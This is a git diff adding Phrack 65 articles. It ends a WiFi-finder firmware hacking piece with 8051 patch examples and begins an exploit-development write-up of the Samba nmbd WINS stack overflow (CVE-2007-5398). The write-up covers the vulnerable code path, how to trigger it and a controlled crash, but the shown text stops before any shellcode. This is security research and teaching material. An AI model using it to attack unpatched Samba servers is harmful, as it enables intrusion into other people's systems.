+Had enough assembly for now?  Let's get back to the descriptions!
+
+
+  When using the firmware upgrade mode, the 16k file must pass an internal
+checksum where the bytes at 0x0E and 0x0F (0x400E, 0x400F) are set so the
+16-bit sum of the entire 16k block is 0x0000.  It's an easy calculation,
+and our program to talk to upgrade mode will check and correct it on the
+fly if needed.  When writing your own, please take this into account:  If
+the entire file is uploaded but the checksum fails, the device will display
+BED CS: ???? on the LCD, with the checksum displayed in the ?? values. 
+The EEPROM will not be updated in the case of a failed checksum.  If the
+checksum is good, the device will display "Erasing", "Upgrading" for a few
+moments and then show the new firmware version before restarting at your
+command. 
+
+  Please note is that the 0xC000 block and maybe the 0x8000 blocks are 
+used as scratchpad memory when a new 16k BIN file is being uploaded.  So 
+if you have located your own code there when you enter firmware upgrade 
+mode, be warned that these blocks will be erased automatically on entry 
+into upgrade mode.
+
+
+
+--[ 8.0 - Inserting Your Own Code
+
+  We assume you have a compiler, and the necessary knowledge to write 8051
+code.  The next step is to insert some of our own code for execution.
+There are essentially two ways to do this: by patching the finder routines
+in the case of using the firmware upgrade mode; Or by patching the
+bootloader in the case that you are overwriting all the memory using the
+ISP Loader.
+
+Either one is fine, but space is very limited in the finder routine,
+basically consisting of about 1400 bytes up at 0x7A80.  Nonetheless, we
+will demonstrate it here. 
+
+The entry point to the finder routines is at 0x4020, jumped to after the
+check for the bootloader.  Here we clear some memory and then jump to the
+main finder routine at 0x71FE.  By inserting a jump or call right after
+we clear the internal RAM, we can divert execution to our own code, which
+we assume resides at 0x7A80.  After our code is done, we can continue on
+with the normal finder routine by jumping then to 0x71FE.  Or, you can
+insert a call down after the RAM clear, and simply return to it.
+
+Original code for finder entry point
+
+org 0x4020
+;-------------------------------------------
+Finder_Entry:
+
+  mov     R0, #0x7F         ; Load the address of top of RAM
+  clr     A                 ; Clear the ACC
+
+Memclear_Loop:              ; seg000_4023
+  mov     @R0, A            ; Store a 0 at the address in R0
+  djnz    R0, Memclear_Loop ; Decrement R0, loop if not done yet
+  mov     SP, #0xA1         ; Set the stack pointer to 0xA1
+  ljmp    Finder_Start      ; Continue to 0x71FE
+
+
+We would insert our jump or call right before the ljmp to Startup. 
+After this ljmp, there is blank space up to 0x4070 so it's no
+problem to insert a few instructions here.  For example..
+
+Modified code for finder entry point
+ 
+org 0x4020
+;-------------------------------------------
+Finder_Entry:
+
+  mov     R0, #0x7F         ; Load the address of top of RAM
+  clr     A                 ; Clear the ACC
+
+Memclear_Loop:              ; seg000_4023
+  mov     @R0, A            ; Store a 0 at the address in R0
+  djnz    R0, Memclear_Loop ; Decrement R0, loop if not done yet
+  mov     SP, #0xA1         ; Set the stack pointer to 0xA1
+  ljmp    MyRoutine         ; Change this jump to our code
+ 
+
+org 0x7A80
+;-------------------------------------------
+MyRoutine:
+  do our instructions here
+  ...
+  ...
+  ljmp    Finder_Start      ; Continue to 0x71FE
+ 
+ 
+ 
+  Now we have not shown the fact that a lot of data exists between
+these two points.  It is best to compile your program and then convert
+the .HEX file to .BIN file (using HEX2BIN.exe-search it or download from
+reference [C]).  Finally you can insert your new code using copy/paste 
+from a hex editor into the proper locations in the original .BIN file 
+before upload to the device.
+
+
+  For the daring folks, it is much better to update the entire EEPROM
+using the ISP Loader.  Then, we can basically take over the entire 16k
+block at 0x8000.  This one is only erased by command when we're in the
+firmware upgrade mode so it is relatively safe.  If you use the EEPROM
+block at 0xC000, you must not enter firmware upgrade mode or it will
+immediately be erased and you will have to reprogram it to get your code
+back into the device.
+
+Upon startup, the device begins executing at 0x0000, where we can only fit
+one instruction: The reset jump vector.  You can always patch this location
+to jump to your code, and later continue with it's original value by
+jumping to location 0x0100.  More desireable is to patch at 0x0109, after
+the device has cleared it's internal RAM and set the stack pointer. 
+
+This code at 0x0100 is almost identical to the start of the finder routine
+we looked at before.  Our strategy is identical, and in this example we
+will take over at 0x0109 and jump to our code at 0x8000.  Once our code is
+done we can continue on by jumping to the next stage of the original
+startup routines (checking the next/seek buttons) with a jump to 0x26D2.
+
+
+Original code for power-on startup.  Jumped to by 0x0000 jump vector.
+
+org 0x0100
+;-------------------------------------------
+Power-ON:
+
+  mov     R0, #0x7F           ; Load the address of top of RAM
+  clr     A                   ; Clear the ACC
+
+Memclear_Loop0:               ; seg000_0103
+  mov     @R0, A              ; Store a 0 at the address in R0
+  djnz    R0, Memclear_Loop0  ; Decrement R0, loop if not done yet
+  mov     SP, #0xA1           ; Set the stack pointer to 0xA1
+  ljmp    Boot_Check          ; Continue to 0x26D2
+
+
+Modified code for power-on startup
+
+
+org 0x0100
+;-------------------------------------------
+Power-ON:
+
+  mov     R0, #0x7F           ; Load the address of top of RAM
+  clr     A                   ; Clear the ACC
+
+Memclear_Loop0:               ; seg000_0103
+  mov     @R0, A              ; Store a 0 at the address in R0
+  djnz    R0, Memclear_Loop0  ; Decrement R0, loop if not done yet
+  mov     SP, #0xA1           ; Set the stack pointer to 0xA1
+  ljmp    MyRoutine           ; Continue to 0x8000 for our code
+ 
+ 
+org 0x8000
+;--------------------------------------------
+MyRoutine:
+  do our instructions here
+  ...
+  ...
+  ljmp    Boot_Check          ; Continue to 0x26D2
+
+
+
+  This approach is a little bit easier to hex edit because it's just a few
+bytes' change down at 0x0109.  Then we can ignorantly paste up to 16k of
+code up at 0x8000.
+
+  Obviously, the best hacks do not use hex editing, but will create a full
+.ASM recreation of the rest of the EEPROM.  Either ourselves or another
+group will eventually release this .ASM file - we are still negotiating -
+but it will take some time as we are all still studying the disassembly.
+
+
+
+--[ 9.0 - Conclusion
+
+  We have just scratched the surface here in this article, to give you the
+tools and a starting point for your own development.  More advanced
+techniques such as inserting two RS232 interfaces between the two boards
+can allow us to monitor all the communications back and forth during the
+finder routine or firmware upgrade mode.  With this method we can easily
+see the command sequences passed back and forth between the two chips. 
+Additionally, USB snooping is a great tool to watch high-level
+communication between the PC and the finder at any time.  Also, these
+commands can be seen in a complete disassembly and analysis of the firmware
+files, which was not included here.  Using your own imagination and
+creativity will lead to many other advances we have not even considered!
+
+
+In conclusion, this article is focused on the hardware hack, so some of
+our musings on the software and discussion of our custom software tools
+were omitted.  For a more in-depth analysis and details, as well as access
+to the software tools described in the article, please visit our web page,
+generously hosted by the Openschemes project at [D].
+
+Good luck, and happy hacking!
+
+
+
+--[ A.0 - References
+
+[1] - IDA Disassembler by DataRescue Corporation
+      http://www.datarescue.com/
+      
+[2] - Keil uVision IDE
+      http://www.keil.com/uvision/
+            
+[3] - Allnet Allspot ALL0298
+      http://www.allnet-usa.com/html/shop.php?kat=WiFi+54Mbit
+      
+[4] - ZyXel AG-225H
+      http://www.zyxel.com  (Direct link too long to include)
+      
+[5] - TrendNet TEW-429UB
+      http://trendnet.com/products/proddetail.asp?prod=155_TEW-429UB
+  
+[6] - Linksys WUSBF54G
+      http://www.linksys.com  (Direct link too long to include)
+      
+[7] - ZD1211 Linux Driver Development
+      http://zd1211.wiki.sourceforge.net      
+      
+[8] - ZyXEL AG-225H WiFi Finder Reverse Engineering
+      http://www.maushammer.com/systems/wififinder/index.html
+      
+[9] - Macronix MX108050A Datasheet
+      http://www.keil.com/dd/docs/datashts/mxic/mx10e8050i.pdf  
+     
+[A] - Maxim MAX3232 Datasheet
+      http://datasheets.maxim-ic.com/en/ds/MAX3222-MAX3241.pdf  
+      
+[B] - Intel Hex Record Format at Keil
+      http://keil.com/support/docs/1584.htm        
+      
+[C] - HEX2BIN Download 
+      http://www.tech-tools.com/d_hx2bin.htm    
+      
+[D] - Wifi Finder Reverse Engineering at Openschemes
+      http://wifi.openschemes.com.             
+
+
+
diff --git a/phrack65/12.txt b/phrack65/12.txt
new file mode 100644
index 0000000..1eb647a
--- /dev/null
+++ b/phrack65/12.txt
@@ -0,0 +1,2395 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0c, Issue 0x41, Phile #0x0c of 0x0f
+
+
+|=-----------------------------------------------------------------------=|
+|=-------------=[     The Art of Exploitation:      ]=-------------------=|
+|=---------=[ Technical analysis of Samba WINS stack overflow  ]=--------=|
+|=--------------------------=[ CVE-2007-5398 ]=--------------------------=|
+|=-----------------------------------------------------------------------=|
+|=-----------------------------------------------------------------------=|
+|=------------=[     By max_packetz@felinemenace.org     ]=--------------=|
+|=-----------------------------------------------------------------------=|
+
+--[ Index
+
+1 - Introduction
+2 - Initial Analysis
+3 - Ubuntu 7.10 Security mechanisms
+4 - Source code walk through
+5 - Writing an exploit for Samba Version 3.0.23c on FreeBSD 6.2
+  5.1 - Verifying valid registration flags
+  5.2 - Ordering the stack data correctly
+  5.3 - Code execution analysis
+  5.4 - Shellcode
+  5.5 - Getting a shell
+  5.6 - Making the exploit more reliable
+    5.6.1 - static .bss data
+    5.6.2 - Memory leak
+    5.6.2 - Back to the future^W.bss
+  5.7 - Additional exploitation notes
+6 - References
+
+--[ 1 - Introduction
+
+On the 15th November, 2007, the Samba team released a security advisory[1]
+detailing a stack overflow in the nmbd daemon, specifically in
+reply_netbios_packet() function in nmbd/nmbd_packets.c.
+
+This vulnerability requires a specific non-standard configuration 
+operation set in smb.conf for the code path to be enabled. Specifically,
+"wins support = yes" needs to be set. This specific vulnerability is not
+going to be present in a default install, nor likely to be found randomly.
+Apart from that, it's a relatively standard vulnerability, with nothing
+to set it apart. 
+
+This article will be my running commentary / analysis while analysing and
+exploiting this bug, every little editing of the article will take place 
+afterwards.. so if I make a stuff up / discover something applicable later
+on that I missed first time, you'll be able to read all about it.
+
+Initially, I will be concerned about how this affects Ubuntu 7.10 by 
+default, however, later on this may change if it turns out not to be
+exploitable, due to various protection mechanisms.
+
+--[ 2 - Initial Analysis
+
+The difference between samba-3.0.26 and samba-3.0.27 is shown directly
+below:
+
+---------------------------------------------
+--- samba-3.0.26/source/nmbd/nmbd_packets.c     
++++ samba-3.0.27/source/nmbd/nmbd_packets.c    
+@@ -963,6 +963,12 @@
+        nmb->answers->ttl      = ttl;
+   
+        if (data && len) {
++               if (len < 0 || len > sizeof(nmb->answers->rdata)) {
++                       DEBUG(5,("reply_netbios_packet: "
++                               "invalid packet len (%d)\n",
++                               len ));
++                       return;
++               }
+                nmb->answers->rdlength = len;
+                memcpy(nmb->answers->rdata, data, len);
+        }
+---------------------------------------------
+
+The additional checks it adds is immediately obvious what the problem is.
+Looking at the function declaration of the reply_netbios_packet() we 
+see:
+
+---------------------------------------------
+void reply_netbios_packet(struct packet_struct *orig_packet,
+	int rcode, enum netbios_reply_type_code rcv_code, int opcode,
+	int ttl, char *data, int len)
+{
+        struct packet_struct packet;
+        struct nmb_packet *nmb = NULL;
+        struct res_rec answers;
+        struct nmb_packet *orig_nmb = &orig_packet->packet.nmb;
+        BOOL loopback_this_packet = False;
+        int rr_type = RR_TYPE_NB;
+        const char *packet_type = "unknown";
+
+        /* Check if we are sending to or from ourselves. */
+        if( ismyip(orig_packet->ip) && 
+	    (orig_packet->port == global_nmb_port)
+	  )
+                loopback_this_packet = True;
+
+        nmb = &packet.packet.nmb;
+	..
+---------------------------------------------
+
+Checking the to see how much space is allocated in nmb->answers->rdata, 
+we see:
+
+---------------------------------------------
+/* A resource record. */
+struct res_rec {
+        struct nmb_name rr_name;
+        int rr_type;
+        int rr_class;
+        int ttl;
+        int rdlength;
+        char rdata[MAX_DGRAM_SIZE];
+};
+
+nameserv.h:#define MAX_DGRAM_SIZE (576) /* tcp/ip datagram limit 
+is 576 bytes */
+---------------------------------------------
+
+To trigger this vulnerability, we need to determine how to reach the
+code in a vulnerable state (with a large len field, greater than 576 
+bytes.)
+
+"grep -A 6 reply_netbios_ * | less" in source/nmbd, we see one that 
+looks particularly interesting, especially due to advisories mentioning 
+"wins support = yes" needing to be configured.
+
+---------------------------------------------
+nmbd_winsserver.c:    reply_netbios_packet(p,   /* Packet to reply to. */
+nmbd_winsserver.c-                   0,/* Result code. */
+nmbd_winsserver.c-                   WINS_QUERY,    /* nmbd type code. */
+nmbd_winsserver.c-                   NMB_NAME_QUERY_OPCODE,  /* opcode. */
+nmbd_winsserver.c-                   lp_min_wins_ttl(),      /* ttl. */
+nmbd_winsserver.c-                   prdata,           /* data to send. */
+nmbd_winsserver.c-                   num_ips*6);        /* data length. */
+----------------------------------------------
+
+Examining this code further we see that it's called in the 
+process_wins_dmb_query_request() function. It looks through all 
+registered hosts of the type 0x1b, counts them, allocates memory, 
+cycles through the linked list again, and records the IP address(es), and
+flags associated with that records. Further more, the code doesn't do any
+checks on the data it is about to pass into the reply_netbios_packet()
+function.
+
+Of specific interest in the process_wins_dmb_query_request() in
+nmbd_winsserver.c, the code is the 
+following:
+
+----------------------------------------------
+  for(i = 0; i < namerec->data.num_ips; i++) {
+    set_nb_flags(&prdata[num_ips * 6],namerec->data.nb_flags);
+    putip((char *)&prdata[(num_ips * 6) + 2], &namerec->data.ip[i]);
+    num_ips++;
+  }
+----------------------------------------------
+
+This is constructing the data to be memcpy()'d later on, in 6 byte
+increments. This could present a problem later on, as the stack layout
+may need to be controlled with extreme precision, and the nb_flags 
+details may be validated.
+
+Since this code path looks plausible, we'll start constructing some code
+to trigger this vulnerability.
+
+By doing a packet dump and loading it into WireShark[2], we can look for
+a WINS host being registered, and start working on an exploit. So far to 
+trigger this vulnerability from reading over the code, we need 
+approximately (576 / 6) registrations of type 0x1b, then we need to
+search for all 0x1b registrations.
+
+-----------------------------------------------
+NetBIOS Name Service
+    Transaction ID: 0x7b60
+    Flags: 0x2910 (Registration)
+        0... .... .... .... = Response: Message is a query
+        .010 1... .... .... = Opcode: Registration (5)
+        .... ..0. .... .... = Truncated: Message is not truncated
+        .... ...1 .... .... = Recursion desired: Do query recursively
+        .... .... ...1 .... = Broadcast: Broadcast packet
+    Questions: 1
+    Answer RRs: 0
+    Authority RRs: 0
+    Additional RRs: 1
+    Queries
+        VULN<20>: type NB, class IN
+            Name: VULN<20> (Server service)
+            Type: NB
+            Class: IN
+    Additional records
+        VULN<20>: type NB, class IN
+            Name: VULN<20> (Server service)
+            Type: NB
+            Class: IN
+            Time to live: 0 time
+            Data length: 6
+            Flags: 0x6000 (H-node, unique)
+                0... .... .... .... = Unique name
+                .11. .... .... .... = H-node
+            Addr: 10.1.1.3
+------------------------------------------------
+
+ * Transaction ID is any 16 bit value.
+ * Flags is specific value, and is 16 bit.
+ * Questions is a 16 bit value.
+ * Answer RRs is a 16 bit value.
+ * Authority RRs is a 16 bit value.
+ * Additional RRs is a 16 bit value.
+
+The "Queries" section is a 32 byte string, which encodes the type of
+registration, in addition with the type/class information. The 
+"Additional records" section has the name as 0xc0 0x0c, which seems to
+indicate to use the name previously unpacked. Further more, the type
+and class information is present, along with time to live, host flag
+information, and address information.
+
+It would appear that when registering is taking place, Samba extracts the
+flags field in the additional records, and the IP address information, 
+and inserts it into the linked list.
+
+With this knowledge, we can start our attempts at exploiting Samba by
+triggering the vulnerability. To reduce the amount of work that needs to
+be done, we'll use impacket [3] to reduce our work.
+
+After writing a preliminary exploit, we can verify the code path we choose
+was correct. The code to trigger the vulnerability is included. We will
+develop the exploit against a default install of Ubuntu 7.10 server 
+version.
+
+The crash looks like
+
+------------------------------------------------
+Program received signal SIGSEGV, Segmentation fault.
+[Switching to Thread -1213143376 (LWP 31330)]
+0x080cd22e in ?? ()
+(gdb) x/10i $eip
+0x80cd22e:      cmp    (%ecx),%al
+0x80cd230:      jne    0x80cd242
+0x80cd232:      movzbl 0xffff0bde(%ebx),%eax
+0x80cd239:      cmp    0x1(%ecx),%al
+0x80cd23c:      je     0x80cd35d
+0x80cd242:      mov    0xffffffbc(%ebp),%edx
+0x80cd245:      lea    0xffffffe0(%ebp),%esi
+0x80cd248:      mov    0x50(%edx),%eax
+0x80cd24b:      movl   $0x20,0x8(%esp)
+0x80cd253:      mov    %edx,0x4(%esp)
+(gdb) i r ecx
+ecx            0x6b6a6968       1802135912
+(gdb) bt
+#0  0x080cd22e in ?? ()
+#1  0xbfe959c8 in ?? ()
+#2  0x08138721 in ?? ()
+#3  0x00000000 in ?? ()
+------------------------------------------------
+
+The value in ecx, 0x6b6a6968 is taken from the trigger code above, in the
+CreatePackets() function, in the ip variable. This at least gives us a 
+start in exploiting the service.
+
+--[ 3 - Ubuntu 7.10 Security mechanisms
+
+Here is a quick overview of the preventative security mechanisms I can 
+see in the default install of Ubuntu 7.10.
+
+ * dmesg shows NX (Execute Disable) protection: active
+ * /proc/pid/maps for nmbd looks like:
+
+-------------------------------------------------
+08048000-08145000 r-xp 00000000 08:01 462765     /usr/sbin/nmbd
+08145000-08150000 rw-p 000fc000 08:01 462765     /usr/sbin/nmbd
+08150000-081ea000 rw-p 08150000 00:00 0          [heap]
+...
+b7fdd000-b7ff7000 r-xp 00000000 08:01 279708     /lib/ld-2.6.1.so
+b7ff7000-b7ff9000 rw-p 00019000 08:01 279708     /lib/ld-2.6.1.so
+bfbc9000-bfbdf000 rw-p bfbc9000 00:00 0          [stack]
+ffffe000-fffff000 r-xp 00000000 00:00 0          [vdso]
+--------------------------------------------------
+
+So while non-execution may be active in some form, it looks like there may
+be some avenues via return-to-text, or jumping to the static vdso mapping.
+
+ * It appears there is a stack cookie implementation being used by the
+   compiler which made nmbd - due to strings output.
+
+--------------------------------------------------
+# strings /usr/sbin/nmbd | grep -i stack | head -n 1
+__stack_chk_fail
+---------------------------------------------------
+
+ * SuSE's apparmor is installed, though a cursory look it doesn't seem 
+   to be used?
+
+---------------------------------------------------
+# apparmor_status 
+apparmor module is loaded.
+0 profiles are loaded.
+0 profiles are in enforce mode.
+0 profiles are in complain mode.
+0 processes have profiles defined.
+0 processes are in enforce mode :
+0 processes are in complain mode.
+0 processes are unconfined but have a profile defined.
+---------------------------------------------------
+
+I'd hazard a guess that all memory regions are executable.. but we'll see 
+how it goes.
+
+So far, the only things that may hinder us a bit is that the:
+
+ * exploit is blind (unless a memory leak is found - which can be worked on
+   later.. or if we're lucky, the static memory address that we can use)
+ * memory randomisation (a little bit, we have a static .text, and a static
+   vdso)
+ * stack cookie checking may influence (either negatively, or positively) 
+   the avenues we have for exploiting the daemon.
+
+--[ 4 - Source code walk through
+
+To exploit the vulnerability, some of the things we need to do is:
+
+ * verify what flags field can be used, as our exploitation techniques may
+   need to keep this in mind, or our shellcode / addresses we use may be 
+   affected in some way.
+ * Analyze exactly what we're overflowing, and what is being affected by
+   the stack overwrite.
+ * Work out how to gain control of execution from the memory overwrite.
+
+To make exploit development easier, we can install the samba-dbg package
+that ships with Ubuntu 7.10. The samba-dbg package has applicable symbols
+for the samba binaries / libraries. This may significantly help us exploit
+the vulnerability, as it will provide variable names, function information,
+and so fourth.
+
+Since we have triggered the vulnerability, it's probably a good idea to 
+start from reading the packets in, and finding where the memory is being 
+used / defined, and work our way forwards to the memcpy(), then following 
+what happens there.
+
+The nmbd server has a main processing loop, called process() funnily 
+enough, in nmbd/nmbd.c.
+
+It reads in and queues the network packets, then processes the packets 
+as shown below:
+
+------------------------------------------
+		/*
+		 * Read incoming UDP packets.
+		 * (nmbd_packets.c)
+		 */
+
+		if(listen_for_packets(run_election))
+			return;
+
+		...
+
+		/*
+		 * Process all incoming packets
+		 * read above. This calls the success and
+		 * failure functions registered when response
+		 * packets arrrive, and also deals with request
+		 * packets from other sources.
+		 * (nmbd_packets.c)
+		 */
+
+		run_packet_queue();
+-------------------------------------------
+
+Which hands off execution to the nmbd/nmbd_packets.c file, in
+run_packet_queue()
+
+run_packet_queue() runs through the list of packets (as the name would
+suggest), identifying if it is NMB packet, or a "dgram" packet. If it is a 
+NMB packet, it checks to see whether or not it is a request, or a response.
+
+As we're dealing with a request type, it hands off execution to
+process_nmb_request() (which is in the same file as before,
+nmbd/nmbd_packets.c).
+
+process_nmb_request() examines the opcode, and hands off execution to
+wins_process_name_query_request() in nmbd/nmbd_winsserver.c
+
+A partial extract of the wins_process_name_query_request() is shown below:
+
+--------------------------------------------
+1879 /*********************************************************************
+1880  Deal with a name query.
+1881 *********************************************************************/
+1882 
+1883 void wins_process_name_query_request(struct subnet_record *subrec,
+1884                                      struct packet_struct *p)
+1885 {
+1886         struct nmb_packet *nmb = &p->packet.nmb;
+1887         struct nmb_name *question = &nmb->question.question_name;
+1888         struct name_record *namerec = NULL;
+1889         unstring qname;
+1890 
+1891 DEBUG(3,(
+         "wins_process_name_query: name query for name %s from IP %s\n",
+1892                 nmb_namestr(question), inet_ntoa(p->ip) ));
+1893 
+1894         /*
+1895          * Special name code. If the queried name is *<1b> then search
+1896          * the entire WINS database and return a list of all the IP 
+                addresses
+1897          * registered to any <1b> name. This is to allow domain master
+                browsers
+1898          * to discover other domains that may not have a presence on 
+                their subnet.
+1899          */
+1900 
+1901         pull_ascii_nstring(qname, sizeof(qname), question->name);
+1902         if(strequal( qname, "*") && (question->name_type == 0x1b)) {
+1903                 process_wins_dmb_query_request( subrec, p);
+1904                 return;
+1905         }
+1906
+--------------------------------------------
+
+Since our trigger packet matches the requirement at 1902, we then jump 
+on to process_wins_dmb_query_request again in nmbd_winsserver.c. Some 
+comments are inline.
+
+
+--------------------------------------------
+1749 /********************************************************************
+1750  Deal with the special name query for *<1b>
+1751 ********************************************************************/
+1752 
+1753 static void process_wins_dmb_query_request(
+                                             struct subnet_record *subrec,
+1754                                         struct packet_struct *p)
+1755 {
+1756         struct name_record *namerec = NULL;
+1757         char *prdata;
+1758         int num_ips;
+1759 
+1760         /*
+1761          * Go through all the ACTIVE names in the WINS db looking for 
+                those
+1762          * ending in <1b>. Use this to calculate the number of IP
+1763          * addresses we need to return.
+1764          */
+1765 
+1766         num_ips = 0;
+1767 
+1768         /* First, clear the in memory list - we're going to 
+                re-populate
+1769            it with the tdb_traversal in 
+                fetch_all_active_wins_1b_names. */
+1770 
+1771         wins_delete_all_tmp_in_memory_records();
+1772 
+1773         fetch_all_active_wins_1b_names();
+1774 
+1775         for( namerec = subrec->namelist; namerec; namerec = 
+                             namerec->next ) {
+1776             if( WINS_STATE_ACTIVE(namerec) && 
+                           namerec->name.name_type == 0x1b) {
+1777                         num_ips += namerec->data.num_ips;
+
+Count how many IP addresses are active, per registration.
+
+1778                 }
+1779         }
+1780 
+1781         if(num_ips == 0) {
+
+None? then bail. 
+
+1782                 /*
+1783                  * There are no 0x1b names registered. 
+                        Return name query fail.
+1784                  */
+1785                 send_wins_name_query_response(NAM_ERR, p, NULL);
+1786                 return;
+1787         }
+1788 
+1789         if((prdata = (char *)SMB_MALLOC( num_ips * 6 )) == NULL) {
+
+Allocate required temporary memory. free()'d at end of function.
+
+1790         DEBUG(0,("process_wins_dmb_query_request: Malloc fail !.\n"));
+1791                 return;
+1792         }
+1793 
+1794         /*
+1795          * Go through all the names again in the WINS db looking for 
+                those
+1796          * ending in <1b>. Add their IP addresses into the list 
+                we will
+1797          * return.
+1798          */
+1799 
+1800         num_ips = 0;
+1801         for( namerec = subrec->namelist; namerec; namerec = 
+                  namerec->next ) {
+1802                 if( WINS_STATE_ACTIVE(namerec) && 
+                              namerec->name.name_type == 0x1b) {
+
+Scan through the linked list of name records, finding suitable records that
+meet the above requirements.
+
+1803                         int i;
+1804                         for(i = 0; i < namerec->data.num_ips; i++) {
+1805                                 set_nb_flags(&prdata[num_ips * 6],
+                                     namerec->data.nb_flags);
+1806                                 putip((char *)&
+                         prdata[(num_ips * 6) + 2], &namerec->data.ip[i]);
+1807                                 num_ips++;
+1808                         }
+
+Copy the data into the allocated memory. Memory is formatted of the type:
+[2 byte flags field][4 byte ip address]
+
+1809                 }
+1810         }
+1811 
+1812         /*
+1813          * Send back the reply containing the IP list.
+1814          */
+1815 
+1816         reply_netbios_packet(p,              /* Packet to reply to. */
+1817                       0,                     /* Result code. */
+1818                       WINS_QUERY,            /* nmbd type code. */
+1819                       NMB_NAME_QUERY_OPCODE,         /* opcode. */
+1820                       lp_min_wins_ttl(),             /* ttl. */
+1821                       prdata,                     /* data to send. */
+1822                       num_ips*6);                 /* data length. */
+1823 
+
+Call reply_netbios_packet. If reached where num_ips*6 > 576, it will 
+trigger the vulnerability.
+
+1824         SAFE_FREE(prdata);
+1825 }
+1826 
+--------------------------------------------
+
+And looking at reply_netbios_packet(), we see:
+
+--------------------------------------------
+ 856 /*******************************************************************
+ 857   Reply to a netbios name packet.  see rfc1002.txt
+ 858 ********************************************************************/
+ 859 
+ 860 void reply_netbios_packet(struct packet_struct *orig_packet,
+ 861                           int rcode, enum netbios_reply_type_code 
+                               rcv_code, 
+                               int opcode,
+ 862                           int ttl, char *data,int len)
+ 863 {
+ 864         struct packet_struct packet;
+
+Locally defined struct packet on the stack
+
+ 865         struct nmb_packet *nmb = NULL;
+ 866         struct res_rec answers;
+
+Locally defined res_rec on the stack.
+
+ 867         struct nmb_packet *orig_nmb = &orig_packet->packet.nmb;
+ 868         BOOL loopback_this_packet = False;
+ 869         int rr_type = RR_TYPE_NB;
+ 870         const char *packet_type = "unknown";
+ 871 
+ 872         /* Check if we are sending to or from ourselves. */
+ 873         if(ismyip(orig_packet->ip) && (orig_packet->port == 
+                global_nmb_port))
+ 874                 loopback_this_packet = True;
+ 875 
+ 876         nmb = &packet.packet.nmb;
+
+Point nmb inside of the above locally declared packet.
+
+ 877 
+ 878         /* Do a partial copy of the packet. We clear the locked flag
+              and
+ 879                         the resource record pointers. */
+ 880         packet = *orig_packet;   /* Full structure copy. */
+ 881         packet.locked = False;
+
+Build the nmb packet response
+
+ 882         nmb->answers = NULL;
+ 883         nmb->nsrecs = NULL;
+ 884         nmb->additional = NULL;
+ 885 
+ 886         switch (rcv_code) {
+ 887                 case NMB_STATUS:
+ 888                         packet_type = "nmb_status";
+ 889                        nmb->header.nm_flags.recursion_desired = False;
+ 890                      nmb->header.nm_flags.recursion_available = False;
+ 891                         rr_type = RR_TYPE_NBSTAT;
+ 892                         break;
+ 893                 case NMB_QUERY:
+ 894                         packet_type = "nmb_query";
+ 895                        nmb->header.nm_flags.recursion_desired = True;
+ 896                      nmb->header.nm_flags.recursion_available = True;
+ 897                         if (rcode) {
+ 898                                 rr_type = RR_TYPE_NULL;
+ 899                         }
+ 900                         break;
+ 901                 case NMB_REG:
+ 902                 case NMB_REG_REFRESH:
+ 903                         packet_type = "nmb_reg";
+ 904                       nmb->header.nm_flags.recursion_desired = True;
+ 905                      nmb->header.nm_flags.recursion_available = True;
+ 906                         break;
+ 907                 case NMB_REL:
+ 908                         packet_type = "nmb_rel";
+ 909                       nmb->header.nm_flags.recursion_desired = False;
+ 910                     nmb->header.nm_flags.recursion_available = False;
+ 911                         break;
+ 912                 case NMB_WAIT_ACK:
+ 913                         packet_type = "nmb_wack";
+ 914                       nmb->header.nm_flags.recursion_desired = False;
+ 915                     nmb->header.nm_flags.recursion_available = False;
+ 916                         rr_type = RR_TYPE_NULL;
+ 917                         break;
+ 918                 case WINS_REG:
+ 919                         packet_type = "wins_reg";
+ 920                       nmb->header.nm_flags.recursion_desired = True;
+ 921                      nmb->header.nm_flags.recursion_available = True;
+ 922                         break;
+ 923                 case WINS_QUERY:
+ 924                         packet_type = "wins_query";
+ 925                      nmb->header.nm_flags.recursion_desired = True;
+ 926                      nmb->header.nm_flags.recursion_available = True;
+ 927                         if (rcode) {
+ 928                                 rr_type = RR_TYPE_NULL;
+ 929                         }
+ 930                         break;
+ 931                 default:
+ 932 DEBUG(0,(
+           "reply_netbios_packet: Unknown packet type: %s %s to ip %s\n",
+ 933          packet_type, nmb_namestr(&orig_nmb->question.question_name),
+ 934                                 inet_ntoa(packet.ip)));
+ 935                         return;
+ 936         }
+ 937 
+ 938         DEBUG(4,(
+   "reply_netbios_packet: sending a reply of packet type: %s %s to ip %s \
+ 939 for id %hu\n", packet_type, nmb_namestr
+            (&orig_nmb->question.question_name),
+ 940              inet_ntoa(packet.ip), orig_nmb->header.name_trn_id));
+ 941 
+ 942         nmb->header.name_trn_id = orig_nmb->header.name_trn_id;
+ 943         nmb->header.opcode = opcode;
+ 944         nmb->header.response = True;
+ 945         nmb->header.nm_flags.bcast = False;
+ 946         nmb->header.nm_flags.trunc = False;
+ 947         nmb->header.nm_flags.authoritative = True;
+ 948 
+ 949         nmb->header.rcode = rcode;
+ 950         nmb->header.qdcount = 0;
+ 951         nmb->header.ancount = 1;
+ 952         nmb->header.nscount = 0;
+ 953         nmb->header.arcount = 0;
+ 954 
+
+Finished building the nmb packet header, now on with the show.
+
+ 955         memset((char*)&nmb->question,'\0',sizeof(nmb->question));
+ 956 
+ 957         nmb->answers = &answers;
+ 958         memset((char*)nmb->answers,'\0',sizeof(*nmb->answers));
+
+Setup nmb->answers, zero the memory.
+
+ 959 
+ 960         nmb->answers->rr_name  = orig_nmb->question.question_name;
+ 961         nmb->answers->rr_type  = rr_type;
+ 962         nmb->answers->rr_class = RR_CLASS_IN;
+ 963         nmb->answers->ttl      = ttl;
+ 964 
+ 965         if (data && len) {
+ 966                 nmb->answers->rdlength = len;
+ 967                 memcpy(nmb->answers->rdata, data, len);
+
+Trigger the overflow, which writes into the function allocated copy of
+answers->rdata, which is defined/mentioned above as:
+
+/* A resource record. */
+struct res_rec {
+        struct nmb_name rr_name;
+        int rr_type;
+        int rr_class;
+        int ttl;
+        int rdlength;
+        char rdata[MAX_DGRAM_SIZE];
+};
+
+nameserv.h:#define MAX_DGRAM_SIZE (576) 
+/* tcp/ip datagram limit is 576 bytes */
+
+ 968         }
+ 969 
+ 970         packet.packet_type = NMB_PACKET;
+ 971         /* Ensure we send out on the same fd that the original
+ 972                 packet came in on to give the correct source IP 
+             address. */
+ 973         packet.fd = orig_packet->fd;
+ 974         packet.timestamp = time(NULL);
+ 975 
+ 976         debug_nmb_packet(&packet);
+ 977 
+ 978         if(loopback_this_packet) {
+ 979                 struct packet_struct *lo_packet;
+ 980                 DEBUG(5,(
+         "reply_netbios_packet: sending packet to ourselves.\n"));
